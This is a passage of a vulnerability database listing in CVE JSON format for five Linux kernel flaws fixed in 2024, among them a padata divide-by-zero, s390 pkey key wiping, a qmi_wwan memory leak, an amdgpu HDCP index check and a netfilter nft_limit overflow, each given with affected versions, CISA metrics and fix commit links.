"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npadata: Fix possible divide-by-0 panic in padata_mt_helper()\n\nWe are hit with a not easily reproducible divide-by-0 panic in padata.c at\nbootup time.\n\n [ 10.017908] Oops: divide error: 0000 1 PREEMPT SMP NOPTI\n [ 10.017908] CPU: 26 PID: 2627 Comm: kworker/u1666:1 Not tainted 6.10.0-15.el10.x86_64 #1\n [ 10.017908] Hardware name: Lenovo ThinkSystem SR950 [7X12CTO1WW]/[7X12CTO1WW], BIOS [PSE140J-2.30] 07/20/2021\n [ 10.017908] Workqueue: events_unbound padata_mt_helper\n [ 10.017908] RIP: 0010:padata_mt_helper+0x39/0xb0\n :\n [ 10.017963] Call Trace:\n [ 10.017968] \u003cTASK\u003e\n [ 10.018004] ? padata_mt_helper+0x39/0xb0\n [ 10.018084] process_one_work+0x174/0x330\n [ 10.018093] worker_thread+0x266/0x3a0\n [ 10.018111] kthread+0xcf/0x100\n [ 10.018124] ret_from_fork+0x31/0x50\n [ 10.018138] ret_from_fork_asm+0x1a/0x30\n [ 10.018147] \u003c/TASK\u003e\n\nLooking at the padata_mt_helper() function, the only way a divide-by-0\npanic can happen is when ps-\u003echunk_size is 0. The way that chunk_size is\ninitialized in padata_do_multithreaded(), chunk_size can be 0 when the\nmin_chunk in the passed-in padata_mt_job structure is 0.\n\nFix this divide-by-0 panic by making sure that chunk_size will be at least\n1 no matter what the input parameters are."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:28:37.846Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ab8b397d5997d8c37610252528edc54bebf9f6d3"
},
{
"url": "https://git.kernel.org/stable/c/8f5ffd2af7274853ff91d6cd62541191d9fbd10d"
},
{
"url": "https://git.kernel.org/stable/c/a29cfcb848c31f22b4de6a531c3e1d68c9bfe09f"
},
{
"url": "https://git.kernel.org/stable/c/924f788c906dccaca30acab86c7124371e1d6f2c"
},
{
"url": "https://git.kernel.org/stable/c/da0ffe84fcc1627a7dff82c80b823b94236af905"
},
{
"url": "https://git.kernel.org/stable/c/6d45e1c948a8b7ed6ceddb14319af69424db730c"
}
],
"title": "padata: Fix possible divide-by-0 panic in padata_mt_helper()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43889",
"datePublished": "2024-08-26T10:10:42.270Z",
"dateReserved": "2024-08-17T09:11:59.288Z",
"dateUpdated": "2025-05-04T09:28:37.846Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42156 (GCVE-0-2024-42156)
Vulnerability from cvelistv5
Published
2024-07-30 07:46
Modified
2025-05-20 14:27
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
s390/pkey: Wipe copies of clear-key structures on failure
Wipe all sensitive data from stack for all IOCTLs, which convert a
clear-key into a protected- or secure-key.
References
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.172Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7f6243edd901b75aaece326c90a1cc0dcb60cc3d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d65d76a44ffe74c73298ada25b0f578680576073"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42156",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:15:08.677401Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:34.120Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/s390/crypto/pkey_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a891938947f4427f98cb1ce54f27223501efe750",
"status": "affected",
"version": "f2bbc96e7cfad3891b7bf9bd3e566b9b7ab4553d",
"versionType": "git"
},
{
"lessThan": "7f6243edd901b75aaece326c90a1cc0dcb60cc3d",
"status": "affected",
"version": "f2bbc96e7cfad3891b7bf9bd3e566b9b7ab4553d",
"versionType": "git"
},
{
"lessThan": "d65d76a44ffe74c73298ada25b0f578680576073",
"status": "affected",
"version": "f2bbc96e7cfad3891b7bf9bd3e566b9b7ab4553d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/s390/crypto/pkey_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.4"
},
{
"lessThan": "5.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.64",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/pkey: Wipe copies of clear-key structures on failure\n\nWipe all sensitive data from stack for all IOCTLs, which convert a\nclear-key into a protected- or secure-key."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-20T14:27:36.396Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a891938947f4427f98cb1ce54f27223501efe750"
},
{
"url": "https://git.kernel.org/stable/c/7f6243edd901b75aaece326c90a1cc0dcb60cc3d"
},
{
"url": "https://git.kernel.org/stable/c/d65d76a44ffe74c73298ada25b0f578680576073"
}
],
"title": "s390/pkey: Wipe copies of clear-key structures on failure",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42156",
"datePublished": "2024-07-30T07:46:58.513Z",
"dateReserved": "2024-07-29T15:50:41.194Z",
"dateUpdated": "2025-05-20T14:27:36.396Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43861 (GCVE-0-2024-43861)
Vulnerability from cvelistv5
Published
2024-08-20 21:37
Modified
2025-05-04 09:27
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: usb: qmi_wwan: fix memory leak for not ip packets
Free the unused skb when not ip packets arrive.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c6adf77953bcec0ad63d7782479452464e50f7a3 Version: c6adf77953bcec0ad63d7782479452464e50f7a3 Version: c6adf77953bcec0ad63d7782479452464e50f7a3 Version: c6adf77953bcec0ad63d7782479452464e50f7a3 Version: c6adf77953bcec0ad63d7782479452464e50f7a3 Version: c6adf77953bcec0ad63d7782479452464e50f7a3 Version: c6adf77953bcec0ad63d7782479452464e50f7a3 Version: c6adf77953bcec0ad63d7782479452464e50f7a3 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43861",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:06:52.223158Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:19.900Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/usb/qmi_wwan.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3c90a69533b5bba73401ef884d033ea49ee99662",
"status": "affected",
"version": "c6adf77953bcec0ad63d7782479452464e50f7a3",
"versionType": "git"
},
{
"lessThan": "37c093449704017870604994ba9b813cdb9475a4",
"status": "affected",
"version": "c6adf77953bcec0ad63d7782479452464e50f7a3",
"versionType": "git"
},
{
"lessThan": "e87f52225e04a7001bf55bbd7a330fa4252327b5",
"status": "affected",
"version": "c6adf77953bcec0ad63d7782479452464e50f7a3",
"versionType": "git"
},
{
"lessThan": "c4251a3deccad852b27e60625f31fba6cc14372f",
"status": "affected",
"version": "c6adf77953bcec0ad63d7782479452464e50f7a3",
"versionType": "git"
},
{
"lessThan": "da518cc9b64df391795d9952aed551e0f782e446",
"status": "affected",
"version": "c6adf77953bcec0ad63d7782479452464e50f7a3",
"versionType": "git"
},
{
"lessThan": "f2c353227de14b0289298ffc3ba92058c4768384",
"status": "affected",
"version": "c6adf77953bcec0ad63d7782479452464e50f7a3",
"versionType": "git"
},
{
"lessThan": "c6c5b91424fafc0f83852d961c10c7e43a001882",
"status": "affected",
"version": "c6adf77953bcec0ad63d7782479452464e50f7a3",
"versionType": "git"
},
{
"lessThan": "7ab107544b777c3bd7feb9fe447367d8edd5b202",
"status": "affected",
"version": "c6adf77953bcec0ad63d7782479452464e50f7a3",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/usb/qmi_wwan.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.12"
},
{
"lessThan": "4.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.105",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.46",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.105",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.46",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.5",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: qmi_wwan: fix memory leak for not ip packets\n\nFree the unused skb when not ip packets arrive."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:27:54.358Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3c90a69533b5bba73401ef884d033ea49ee99662"
},
{
"url": "https://git.kernel.org/stable/c/37c093449704017870604994ba9b813cdb9475a4"
},
{
"url": "https://git.kernel.org/stable/c/e87f52225e04a7001bf55bbd7a330fa4252327b5"
},
{
"url": "https://git.kernel.org/stable/c/c4251a3deccad852b27e60625f31fba6cc14372f"
},
{
"url": "https://git.kernel.org/stable/c/da518cc9b64df391795d9952aed551e0f782e446"
},
{
"url": "https://git.kernel.org/stable/c/f2c353227de14b0289298ffc3ba92058c4768384"
},
{
"url": "https://git.kernel.org/stable/c/c6c5b91424fafc0f83852d961c10c7e43a001882"
},
{
"url": "https://git.kernel.org/stable/c/7ab107544b777c3bd7feb9fe447367d8edd5b202"
}
],
"title": "net: usb: qmi_wwan: fix memory leak for not ip packets",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43861",
"datePublished": "2024-08-20T21:37:53.029Z",
"dateReserved": "2024-08-17T09:11:59.279Z",
"dateUpdated": "2025-05-04T09:27:54.358Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42121 (GCVE-0-2024-42121)
Vulnerability from cvelistv5
Published
2024-07-30 07:46
Modified
2025-09-08 15:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Check index msg_id before read or write
[WHAT]
msg_id is used as an array index and it cannot be a negative value, and
therefore cannot be equal to MOD_HDCP_MESSAGE_ID_INVALID (-1).
[HOW]
Check whether msg_id is valid before reading and setting.
This fixes 4 OVERRUN issues reported by Coverity.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c Version: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c Version: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c Version: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c Version: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c Version: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.543Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b5b8837d066cc182ff69fb5629ad32ade5484567"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fbb0701af9734cff13917a4b98b5ee9da2fde48d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ae91ffbc8b8d942e3e7f188728cad557b7ed5ee4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9933eca6ada0cd612e19522e7a319bcef464c0eb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a31ea49dc8064a557565725cf045944307476a6e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/59d99deb330af206a4541db0c4da8f73880fba03"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42121",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:16:57.136041Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:05.184Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b5b8837d066cc182ff69fb5629ad32ade5484567",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "fbb0701af9734cff13917a4b98b5ee9da2fde48d",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "ae91ffbc8b8d942e3e7f188728cad557b7ed5ee4",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "9933eca6ada0cd612e19522e7a319bcef464c0eb",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "a31ea49dc8064a557565725cf045944307476a6e",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "59d99deb330af206a4541db0c4da8f73880fba03",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.15"
},
{
"lessThan": "4.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.222",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.98",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.222",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.98",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Check index msg_id before read or write\n\n[WHAT]\nmsg_id is used as an array index and it cannot be a negative value, and\ntherefore cannot be equal to MOD_HDCP_MESSAGE_ID_INVALID (-1).\n\n[HOW]\nCheck whether msg_id is valid before reading and setting.\n\nThis fixes 4 OVERRUN issues reported by Coverity."
}
],
"providerMetadata": {
"dateUpdated": "2025-09-08T15:21:45.179Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b5b8837d066cc182ff69fb5629ad32ade5484567"
},
{
"url": "https://git.kernel.org/stable/c/fbb0701af9734cff13917a4b98b5ee9da2fde48d"
},
{
"url": "https://git.kernel.org/stable/c/ae91ffbc8b8d942e3e7f188728cad557b7ed5ee4"
},
{
"url": "https://git.kernel.org/stable/c/9933eca6ada0cd612e19522e7a319bcef464c0eb"
},
{
"url": "https://git.kernel.org/stable/c/a31ea49dc8064a557565725cf045944307476a6e"
},
{
"url": "https://git.kernel.org/stable/c/59d99deb330af206a4541db0c4da8f73880fba03"
}
],
"title": "drm/amd/display: Check index msg_id before read or write",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42121",
"datePublished": "2024-07-30T07:46:13.064Z",
"dateReserved": "2024-07-29T15:50:41.179Z",
"dateUpdated": "2025-09-08T15:21:45.179Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26668 (GCVE-0-2024-26668)
Vulnerability from cvelistv5
Published
2024-04-02 06:43
Modified
2025-05-04 08:53
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nft_limit: reject configurations that cause integer overflow
Reject bogus configs where internal token counter wraps around.
This only occurs with very very large requests, such as 17gbyte/s.
Its better to reject this rather than having incorrect ratelimit.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.622Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/79d4efd75e7dbecd855a3b8a63e65f7265f466e1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bc6e242bb74e2ae616bfd2b250682b738e781c9b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9882495d02ecc490604f747437a40626dc9160d0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/00c2c29aa36d1d1827c51a3720e9f893a22c7c6a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c9d9eb9c53d37cdebbad56b91e40baf42d5a97aa"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26668",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:53:39.375879Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:38.702Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nft_limit.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "79d4efd75e7dbecd855a3b8a63e65f7265f466e1",
"status": "affected",
"version": "d2168e849ebf617b2b7feae44c0c0baf739cb610",
"versionType": "git"
},
{
"lessThan": "bc6e242bb74e2ae616bfd2b250682b738e781c9b",
"status": "affected",
"version": "d2168e849ebf617b2b7feae44c0c0baf739cb610",
"versionType": "git"
},
{
"lessThan": "9882495d02ecc490604f747437a40626dc9160d0",
"status": "affected",
"version": "d2168e849ebf617b2b7feae44c0c0baf739cb610",
"versionType": "git"
},
{
"lessThan": "00c2c29aa36d1d1827c51a3720e9f893a22c7c6a",
"status": "affected",
"version": "d2168e849ebf617b2b7feae44c0c0baf739cb610",
"versionType": "git"
},
{
"lessThan": "c9d9eb9c53d37cdebbad56b91e40baf42d5a97aa",
"status": "affected",
"version": "d2168e849ebf617b2b7feae44c0c0baf739cb610",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nft_limit.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.3"
},
{
"lessThan": "4.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_limit: reject configurations that cause integer overflow\n\nReject bogus configs where internal token counter wraps around.\nThis only occurs with very very large requests, such as 17gbyte/s.\n\nIts better to reject this rather than having incorrect ratelimit."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:53:32.255Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/79d4efd75e7dbecd855a3b8a63e65f7265f466e1"
},
{
"url": "https://git.kernel.org/stable/c/bc6e242bb74e2ae616bfd2b250682b738e781c9b"
},
{
"url": "https://git.kernel.org/stable/c/9882495d02ecc490604f747437a40626dc9160d0"
},
{
"url": "https://git.kernel.org/stable/c/00c2c29aa36d1d1827c51a3720e9f893a22c7c6a"
},
{
"url": "https://git.kernel.org/stable/c/c9d9eb9c53d37cdebbad56b91e40baf42d5a97aa"
}
],
"title": "netfilter: nft_limit: reject configurations that cause integer overflow",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26668",
"datePublished": "2024-04-02T06:43:29.690Z",
"dateReserved": "2024-02-19T14:20:24.149Z",
